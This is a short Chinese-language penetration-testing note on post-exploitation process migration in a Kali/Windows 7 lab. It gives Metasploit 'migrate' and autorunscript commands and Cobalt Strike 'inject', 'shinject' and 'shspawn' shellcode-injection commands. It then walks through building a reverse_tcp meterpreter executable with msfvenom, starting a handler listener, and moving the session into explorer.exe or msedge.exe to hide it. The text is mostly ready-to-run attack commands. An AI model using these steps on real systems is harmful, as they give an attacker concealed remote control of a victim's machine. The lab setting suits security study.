#Msfvenom
#进程迁移
#pid
虚拟机环境搭建
【Kali】,192.168.10.131
【win7】,192.168.10.134
一、MSF进程迁移
1.1 手动迁移
migrate pid 或者 migrate -N 应用名字[推荐:explorer.exe]
1.2 自动迁移
set autorunscript migrate -n explorer.exe
或者使用默认迁移的
set autorunscript migrate -f // 默认迁移到notepad.exe
二、CS进程迁移
inject
inject PID 架构【默认x86】
inject 5732 x64 选择生成exe的监听器
shinhect命令 需要指定bin,选择raw
shinject 5732 x64 /xxx.bin =>> PID
shspawn 作用是启动一个进程并将shellcode注入其中
shspawn x64 /xxx.bin
三、MSF进程迁移实战
反弹shell的exe:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lpost=4444 -f exe -o 1.exe
执行监听:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set Lhost 192.168.xxx.xxx
run -j
客户端点击exe,上线成功:
3.1 手动迁移进程
选择会话
获取当前会话的PID
查看进程PS
迁移文件管理器的进程。迁移成功
migrate pid
或者使用exe名称:
migrate -N msedge.exe
3.2 自动迁移进程
木马程序为 1.exe
添加命令
set autorunscript migrate -n explorer.exe
上线回显情况即可发现做了进程迁移
还有一个默认,帮我们默认迁移exe
set autorunscript migrate -f